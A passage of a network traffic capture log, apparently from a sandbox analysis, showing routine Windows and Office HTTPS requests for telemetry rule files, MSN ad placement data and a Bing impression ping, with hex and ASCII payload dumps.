2024-11-21 08:53:56 UTC	74	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 49 7a 63 31 4a 70 4f 44 57 6b 71 4d 30 4b 79 35 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 37 62 38 34 62 36 35 39 36 38 38 37 37 64 30 62 0d 0a 0d 0a Data Ascii: BND 3 CON\QOS 56MS-CV: Izc1JpODWkqM0Ky5.3Context: 7b84b65968877d0b
2024-11-21 08:53:57 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-21 08:53:57 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 79 58 2b 6b 38 43 4b 59 62 6b 43 57 66 6f 47 45 31 67 48 51 6b 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: yX+k8CKYbkCWfoGE1gHQkg.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
60	192.168.2.6	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:56 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:57 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:57 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: bf14eb60-501e-007b-507b-3b5ba2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085357Z-1777c6cb754j8gqphC1TEB5bf80000000arg00000000c39a x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:57 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
61	192.168.2.6	49786	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:56 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:57 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:57 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: fdab78a3-101e-005a-1d8c-3a882b000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085357Z-1777c6cb754mqztshC1TEB4mkc0000000az0000000003qt8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:57 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.6	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:57 UTC	192	OUT	GET /rules/rule120638v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:57 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:57 GMT Content-Type: text/xml Content-Length: 486 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT ETag: "0x8DC582B92FCB436" x-ms-request-id: 95b9e869-801e-008c-3081-3b7130000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085357Z-1777c6cb754mqztshC1TEB4mkc0000000azg000000002q0u x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:57 UTC	486	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.6	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:57 UTC	192	OUT	GET /rules/rule120639v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:57 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:57 GMT Content-Type: text/xml Content-Length: 423 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT ETag: "0x8DC582BB7564CE8" x-ms-request-id: 57b2d8b6-201e-0033-2767-3bb167000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085357Z-178bfbc474b7cbwqhC1NYC8z4n0000000140000000009246 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:57 UTC	423	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	49790	20.31.169.57	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:57 UTC	2591	OUT	GET /v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=88000045&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&ctry=CH&time=20241121T085354Z&lc=en-CH&pl=en-CH,en-GB&idtp=mid&uid=d215e385-cdc6-4502-a974-fb4c5f95db96&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=cb2bb42c043242769558543079a1da9e&ctmode=MultiSession&arch=x64&betaedgever=0.0.0.0&canedgever=0.0.0.0&cdm=1&cdmver=10.0.19041.1023&devedgever=0.0.0.0&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.19045.2006&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=594875&metered=false&nettype=ethernet&npid=sc-88000045&oemName=dstkfa%2C%20Inc.&oemid=Public&ossku=Professional&scmid=Public&smBiosDm=dstkfa20%2C1&stabedgever=117.0.2045.55&svcmpt=Red&svgtng=2&svtmexp=1699747200&svtmupd=1696486876&tl=2&tsu=594875&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1& [TRUNCATED] Accept-Encoding: gzip, deflate X-SDK-CACHE: chs=0&imp=0&chf=0&ds=50543&fs=23594&sc=6 X-SDK-HW-TOKEN: t=EwDoAppeBAAUGoFunEzxzyai/T0i5tnZAAR1eX0AAWYBm1YhnWoZBXbxPqZv4jRbyYFHrXoCKR8yDlRnn5fz9cMrDvM+ENKhD58WblGKZvckPKo/wxPIBbNstb0a2ffybX7HLt0ANyVaSOF7yfazU1km1LRmAJImRCqRFOvbSeCgr9nGr4JJlK1g2kHWSY2n2Ux7l9qmifugenC5Seu7nro4iraU6TkR1XJDMLHsIcbGfec417uFzjU8iMpawtToPCYl8bkXGQiexGQckPwGJVuDOKlyRMvBKs4JFkcP4rplqE09bXs40pZZAjn6ud+JzDRRft/NA3aBoAlpWT2sXivcw68J8XKFlFMoxUE5ONabQJ3eLb0h2TwLTWSz3xAQZgAAEKv1bfM52QovIJZ/GlI490+wAQpNh6iykWToQrnRw42RSQRR2vToYZiMgaRsz8+HWayT7YDyUUGF5mPQKeC7ZqVynuoUKSicpivtnbK8YY29gjb8py/VJSCYapXVUNTpt+U/ZMWc7Rh1WqLwSwAoTLk1GG9d6J3V+IstiyJ1nIKrVdD0gfCd47wP+tQk52QFuqNaF0OWZoPysIPqnl3bZR36j38Q4BHn8wAIosGAWJezSujeaz2BOK3rmmBvbiFFP3WQgoNVTU5Q+knRmm05xYJyhkFMdcgPcoJQKbFKb+qdgnKrNKK2APbcM6UjSinyK9cEFv4OBLELc6I/SCh0DnWkFkx2Ip9ra1/chCzhKzSg6e//jPGbTVZYx1QvEgva4Jn3AG5hQl/xjki+lH0C6uVVnvUVc8f3zIQlz7/2wZTxIrPmKiKamR7lUygh/d5RHES89LP2Q6OOO5v3cLOVK6m7eSeOTH2+jTbOxJ2UPERUHiVzTvGBIbspCPanimX95zw30mLkwiJGvqisfX3NnSLJLgReXRwG7XofDs4LW5N1oV6IljwJqh6t/XlJBzxYOYajy4SNCWQot/zRBDO+AmAMudcB&p= Cache-Control: no-cache MS-CV: XnfZp6+Bo0ykbYbI.0 User-Agent: WindowsShellClient/9.0.40929.0 (Windows) X-SDK-HWF: arm0,arm640,ble0,cmb0,cmf0,cmr0,dcb1,dcc1,dx91,dxa1,dxb1,gyr0,hce0,hdc0,hov0,hsa0,hss1,kbd1,m041,m060,m080,m120,m160,m200,m301,m751,mA01,mct0,mgn0,mic0,mrc0,mse1,mT01,nfc0,rs10,rs20,rs30,rs40,rs50,rs60,tch0,tel0,v010,v020,v040,x641,x860,x86a640,xbd0,xbo0,xbs0,xbx0,xgp0 Host: arc.msn.com Connection: Keep-Alive
2024-11-21 08:53:58 UTC	955	IN	HTTP/1.1 200 OK Cache-Control: no-store, no-cache Pragma: no-cache Content-Length: 2943 Content-Type: application/json; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/10.0 ARC-RSP-DBG: [{"RADIDS":"1,P425116216-T1-C128000000001627409+B+P10+S1"},{"OPTOUTSTATE":"65792"},{"REGIONALPOLICY":"1"}] X-ARC-SIG: ctfnaUvWZBwNCw1AkbmI/qbGOSUP1KdDbLnKXGk7KbOAVuhwL3W6+caxx7jT0+b2WTAHHSe0fvhaSciajZn8nZkZb27XGkAZPH83ubk+y3rfNa+v5/hpZzHf41KpH6UhL672eWX2jHygkgX2Ryf9zl3JesAWTyzoe4eh6ftDhFkKiG4CI1hZxAKNnVCqROASyz94YYxgHAL3U3wCuNX0kI/3lYqL5EIkuZYJ/WtE31EdLYblESBXf5MUh3G2bdactDa/rWqj6fea+K8F8B66DKN6Y3XFh3++otvBI9tghs6wyW1zPs3+sZT/IvxWxxx4UbcekQYAwlA6gwW04za60Q== Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET Strict-Transport-Security: max-age=31536000; includeSubDomains Date: Thu, 21 Nov 2024 08:53:57 GMT Connection: close
2024-11-21 08:53:58 UTC	2943	IN	Data Raw: 7b 22 62 61 74 63 68 72 73 70 22 3a 7b 22 76 65 72 22 3a 22 31 2e 30 22 2c 22 69 74 65 6d 73 22 3a 5b 7b 22 69 74 65 6d 22 3a 22 7b 5c 22 66 5c 22 3a 5c 22 72 61 66 5c 22 2c 5c 22 76 5c 22 3a 5c 22 31 2e 30 5c 22 2c 5c 22 72 64 72 5c 22 3a 5b 7b 5c 22 63 5c 22 3a 5c 22 43 44 4d 5c 22 2c 5c 22 75 5c 22 3a 5c 22 53 75 62 73 63 72 69 62 65 64 43 6f 6e 74 65 6e 74 5c 22 7d 5d 2c 5c 22 61 64 5c 22 3a 7b 5c 22 63 6c 61 73 73 5c 22 3a 5c 22 63 6f 6e 74 65 6e 74 5c 22 2c 5c 22 63 6f 6c 6c 65 63 74 69 6f 6e 73 5c 22 3a 5b 5d 2c 5c 22 69 74 65 6d 50 72 6f 70 65 72 74 79 4d 61 6e 69 66 65 73 74 5c 22 3a 7b 5c 22 6e 6f 4f 70 5c 22 3a 7b 5c 22 74 79 70 65 5c 22 3a 5c 22 61 63 74 69 6f 6e 5c 22 7d 7d 2c 5c 22 69 74 65 6d 73 5c 22 3a 5b 7b 5c 22 70 72 6f 70 65 72 74 69 Data Ascii: {"batchrsp":{"ver":"1.0","items":[{"item":"{\"f\":\"raf\",\"v\":\"1.0\",\"rdr\":[{\"c\":\"CDM\",\"u\":\"SubscribedContent\"}],\"ad\":{\"class\":\"content\",\"collections\":[],\"itemPropertyManifest\":{\"noOp\":{\"type\":\"action\"}},\"items\":[{\"properti

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.6	49791	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:58 UTC	732	OUT	GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8Z_v81Dv1u-hUjbGzlJ65tzVUCUyPu4-NplKM68oFgfLVKaAhGbxhP_Yix7rD1yj3DZeTe9ESVs0HufByhMqtMcvIiBN_vJ4uZO_8-OrObcoMEbWIif1LYVW0nbRv88628l9nxeu-547jSfRBWpiuOQibrC0OFZZITZ_DI0RcIKA3BrqS%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZm9uZWRyaXZlLmxpdmUuY29tJTJmJTNmb2NpZCUzZGNtbTA3YjdkbnU0%26rlid%3D863654e9941b19c80bb133d761025d5c&TIME=20241121T085354Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:068D482D-8F3B-78AE-DAA0-0C08B8FF2AE6&deviceId=6966555320912735&anid=DA18C8825356BAC4E7B23066FFFFFFFF HTTP/1.1 Accept-Encoding: gzip, deflate User-Agent: WindowsShellClient/9.0.40929.0 (Windows) Host: g.bing.com Connection: Keep-Alive
2024-11-21 08:53:58 UTC	864	IN	HTTP/1.1 204 No Content Cache-Control: no-cache, must-revalidate Pragma: no-cache Expires: Fri, 01 Jan 1990 00:00:00 GMT Set-Cookie: MUID=3C4135E85708611F0A8020D6566A6038; domain=.bing.com; expires=Tue, 16-Dec-2025 08:53:58 GMT; path=/; SameSite=None; Secure; Priority=High; Set-Cookie: MR=0; domain=g.bing.com; expires=Thu, 28-Nov-2024 08:53:58 GMT; path=/; SameSite=None; Secure; Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * X-Cache: CONFIG_NOCACHE Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: BD30B0CEFC27441DA767DB7E2C125D76 Ref B: EWR311000106045 Ref C: 2024-11-21T08:53:58Z Date: Thu, 21 Nov 2024 08:53:57 GMT Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.6	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:58 UTC	192	OUT	GET /rules/rule120640v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:59 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:59 GMT Content-Type: text/xml Content-Length: 478 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT ETag: "0x8DC582B9B233827" x-ms-request-id: 9f194ed4-601e-0070-357c-3ba0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085359Z-178bfbc474bw8bwphC1NYC38b4000000011000000000ad8r x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:59 UTC	478	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.6	49794	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:59 UTC	192	OUT	GET /rules/rule120642v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:59 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:59 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT ETag: "0x8DC582BB046B576" x-ms-request-id: 20e2cd06-701e-005c-2869-3bbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085359Z-178bfbc474bwlrhlhC1NYCy3kg000000016000000000as83 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:59 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.6	49793	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:59 UTC	192	OUT	GET /rules/rule120641v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:59 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:59 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT ETag: "0x8DC582B95C61A3C" x-ms-request-id: d277967d-801e-0047-0163-3b7265000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085359Z-178bfbc474bw8bwphC1NYC38b40000000160000000000082 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-21 08:53:59 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.6	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:59 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-21 08:53:59 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 21 Nov 2024 08:53:59 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: bfe6d614-201e-006e-7a8c-3abbe3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241121T085359Z-1777c6cb754gvvgfhC1TEBz4rg0000000av000000000dfpx x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
